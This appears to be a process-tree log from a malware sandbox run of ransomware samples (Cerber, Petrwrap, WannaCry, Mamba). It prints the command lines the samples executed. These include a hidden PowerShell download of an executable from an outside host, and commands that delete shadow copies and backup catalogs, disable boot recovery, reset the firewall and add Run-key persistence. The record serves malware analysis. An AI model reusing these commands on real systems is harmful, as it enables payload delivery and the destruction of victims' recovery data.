                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5960 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3144
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3112 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                              2⤵
                                PID:3560
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5728 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                2⤵
                                  PID:4376
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6076 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                  2⤵
                                    PID:4088
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=688 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                    2⤵
                                      PID:2468
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6128 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                      2⤵
                                        PID:3476
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4768 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                        2⤵
                                          PID:256
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2876 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                          2⤵
                                            PID:376
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5636 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                            2⤵
                                              PID:432
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                              2⤵
                                                PID:4920
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6240 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                2⤵
                                                  PID:916
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6152 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                                  2⤵
                                                    PID:3516
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6328 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                    2⤵
                                                      PID:2080
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1612 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                      2⤵
                                                        PID:2860
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=960 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                        2⤵
                                                          PID:4444
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4556 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                                          2⤵
                                                            PID:3596
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5644 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                                            2⤵
                                                              PID:3460
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6300 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                              2⤵
                                                                PID:2888
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1492 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                                                                2⤵
                                                                  PID:4928
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4472 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                                                                  2⤵
                                                                    PID:1548
                                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                  1⤵
                                                                    PID:2196
                                                                  • C:\Windows\System32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    1⤵
                                                                      PID:1200
                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3908
                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4656
                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:1028
                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:1392
                                                                    • C:\Users\Admin\Desktop\131.exe
                                                                      "C:\Users\Admin\Desktop\131.exe"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:744
                                                                    • C:\Windows\system32\OpenWith.exe
                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3500
                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Cerber.zip\cerber.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Cerber.zip\cerber.exe"
                                                                      1⤵
                                                                      • Drops startup file
                                                                      • Drops file in System32 directory
                                                                      • Sets desktop wallpaper using registry
                                                                      • Drops file in Program Files directory
                                                                      • Drops file in Windows directory
                                                                      • Modifies registry class
                                                                      PID:1976
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                        2⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:3480
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        C:\Windows\system32\netsh.exe advfirewall reset
                                                                        2⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1960
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___7MFEY_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                        2⤵
                                                                          PID:4940
                                                                        • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___XWLTAA0_.txt
                                                                          2⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:2572
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe"
                                                                          2⤵
                                                                            PID:1896
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im "cerber.exe"
                                                                              3⤵
                                                                              • Kills process with taskkill
                                                                              PID:1788
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping -n 1 127.0.0.1
                                                                              3⤵
                                                                              • Runs ping.exe
                                                                              PID:3136
                                                                        • C:\Windows\SysWOW64\werfault.exe
                                                                          werfault.exe /h /shared Global\61c61f9f891541efbaf8826ce0a5001e /t 4932 /p 4940
                                                                          1⤵
                                                                            PID:780
                                                                          • C:\Windows\system32\OpenWith.exe
                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2328
                                                                          • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                            "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ClearRead.docx" /o ""
                                                                            1⤵
                                                                            • Checks processor information in registry
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4304
                                                                          • C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe
                                                                            "C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe"
                                                                            1⤵
                                                                            • Drops startup file
                                                                            • Drops desktop.ini file(s)
                                                                            • Drops file in Windows directory
                                                                            PID:2328
                                                                          • C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe
                                                                            "C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe"
                                                                            1⤵
                                                                              PID:4644
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Documents\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3496
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\8391.exe');
                                                                                2⤵
                                                                                • Blocklisted process makes network request
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:4892
                                                                              • C:\Windows\notepad.exe
                                                                                "C:\Windows\notepad.exe" -c "C:\Users\Admin\AppData\Local\JesYXqkYNx\cfg"
                                                                                2⤵
                                                                                  PID:1016
                                                                                • C:\Windows\notepad.exe
                                                                                  "C:\Windows\notepad.exe" -c "C:\Users\Admin\AppData\Local\JesYXqkYNx\cfgi"
                                                                                  2⤵
                                                                                    PID:68
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
                                                                                  1⤵
                                                                                  • Drops startup file
                                                                                  • Sets desktop wallpaper using registry
                                                                                  PID:2740
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h .
                                                                                    2⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:4868
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                    2⤵
                                                                                    • Modifies file permissions
                                                                                    PID:1960
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                    taskdl.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3856
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c 112351720038089.bat
                                                                                    2⤵
                                                                                      PID:2908
                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                        cscript.exe //nologo m.vbs
                                                                                        3⤵
                                                                                          PID:1476
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +h +s F:\$RECYCLE
                                                                                        2⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:4260
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        @[email protected] co
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:2548
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                          TaskData\Tor\taskhsvc.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5028
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c start /b @[email protected] vs
                                                                                        2⤵
                                                                                          PID:652
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                            @[email protected] vs
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:848
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                              4⤵
                                                                                                PID:2784
                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                  5⤵
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:4376
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  wmic shadowcopy delete
                                                                                                  5⤵
                                                                                                    PID:4088
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2568
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                              @[email protected]
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Sets desktop wallpaper using registry
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4804
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                              2⤵
                                                                                                PID:3976
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                                  3⤵
                                                                                                  • Adds Run key to start application
                                                                                                  • Modifies registry key
                                                                                                  PID:1696
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1428
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2860
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3808
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:428
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4884
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3856
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4288
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4192
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4992
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4404
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2924
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:948
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4724
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1288
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2788
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4940
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4520
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:600
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5036
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:96
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1176
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2672
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1324
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4988
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4208
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2716
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3960
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4624
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2908
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2520
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4584
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4088
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3300
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1392
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1236
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1008
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4736
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3488
